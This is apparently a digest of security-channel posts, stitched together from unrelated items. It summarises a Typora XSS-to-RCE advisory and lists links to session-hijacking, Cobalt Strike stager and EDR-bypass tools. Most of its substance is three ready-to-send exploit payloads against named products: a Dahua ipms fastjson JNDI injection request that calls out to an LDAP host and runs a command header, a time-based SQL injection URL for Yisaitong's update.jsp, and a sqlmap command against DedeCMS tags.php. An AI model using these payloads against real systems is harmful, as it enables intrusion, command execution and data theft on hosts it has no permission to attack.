(CVE-2023-2317) Typora DOM-based cross-site scripting leading to remote code execution
Typora is a popular cross-platform Markdown editor that lets users create and edit Markdown files with live preview.
https://starlabs.sg/advisories/23/23-2317/
STAR Labs
(CVE-2023-2317) Typora DOM-Based Cross-site Scripting leading to Remote Code Execution
Summary:
Product: Typora
Vendor: Typora
Severity: High
Affected Versions: Typora for Windows/Linux < 1.6.7
Tested Versions: Typora for Windows 1.5.12, Typora for Linux 1.5.10
CVE Identifier: CVE-2023-2317
CVE Description: DOM-based XSS in updater/update.html…
Dahua Smart Park Integrated Management Platform ipms remote code execution vulnerability POC
POST /ipms/barpay/pay HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: id
Content-Type: application/json
Accept-Encoding: gzip
Content-Length: 104
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://xxxxx/Basic/TomcatEcho", "autoCommit": true}
亿塞通 (Yisaitong) update.jsp SQL injection vulnerability POC
GET http://1ip:port/CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20D ELAY%20%270:0:2%27--
Forwarded from 踹哈公寓
A self-study guide to Pwn, from 0 to 0.1
Assembly-Language (assembly language)
Reverse-Engineering (reverse engineering)
PWN Tools (analysis tools)
PWN You-just-got-pwned!
Reverse Tools (analysis tools)
Angr CTF and its write-ups
Link: https://pan.quark.cn/s/7a7b26010e18
Session hijacking: a tool that allows user sessions to be hijacked by injecting malicious JavaScript code.
https://github.com/doyensec/Session-Hijacking-Visual-Exploitation
GitHub - doyensec/Session-Hijacking-Visual-Exploitation: Session Hijacking Visual Exploitation
17 methods of fileless execution (no file written to disk).
https://github.com/RedXRanger/StageStrike
GitHub - RedXRanger/StageStrike: Custom Cobalt Strike stagers using different methods of thread execution and memory allocation
A PoC of the ContainYourself research presented at DEF CON 31, which abuses the Windows container framework to bypass EDR
https://github.com/deepinstinct/ContainYourself
A PoC of the ContainYourself research presented in DEFCON 31, which abuses the Windows containers framework to bypass EDRs. - deepinstinct/ContainYourself
DedeCMS SQL injection POC
A critical vulnerability was found in DedeCMS 5.7.110. It affects unknown code in the file /uploads/tags.php. Manipulation of the parameter tag_alias leads to SQL injection.
sqlmap.py -u "http://……/tags.php?QUERY_STRING=/alias/bbb*" -dbs --batch